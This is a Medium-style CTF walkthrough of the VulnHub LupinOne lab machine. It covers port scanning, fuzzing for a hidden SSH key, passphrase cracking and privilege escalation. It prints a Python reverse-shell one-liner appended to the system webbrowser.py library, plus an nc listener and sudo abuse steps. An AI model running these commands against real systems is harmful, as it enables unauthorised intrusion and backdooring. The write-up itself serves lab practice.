VulnHub: LupinOne

Today we will take a look at Vulnhub: LupinOne. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 — open

Let’s look at the “~ myfiles” extension.

We got Error, but let’s check again
  • FFUF

Command: ffuf -u ‘http://lupin/~FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Here we have a username. Now let’s find his private key file. As we know, private keys “.” is written after the symbol.

Command: ffuf -u ‘http://lupin/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub -fw 20

We found the encrypted text. Let’s look at cyberchef to decrypt. After researching, I found that it was base58

Let’s check the connection to the target machine.

We use the fasttrack.txt file to crack the passphrase password, as stated in the message.

Command: echo ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’ >> /usr/lib/python3.9/webbrowser.py

Command: nc -nvlp 4242

Command: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

https://gtfobins.github.io/gtfobins/pip/

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Greedy ‘Connect 4’ For Fun and Profit

Rest Api In OOP PHP Step By Step

60 days to become a game developer. Day 57.

How to check your PC login activities in Windows PC and filter the result

What Are Some Ways to Improve and Prioritize Feedforward and Fast Feedback Control?

How to set up local Apache Spark environment (5 ways)

SWE.4 Software Unit Verification 軟體單元驗證

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Linux PrivEsc Walkthrough- Part 1 (Task 1 to 8)

DiceCTF 2022 — write-up

Watcher Writeup THM

Anonymous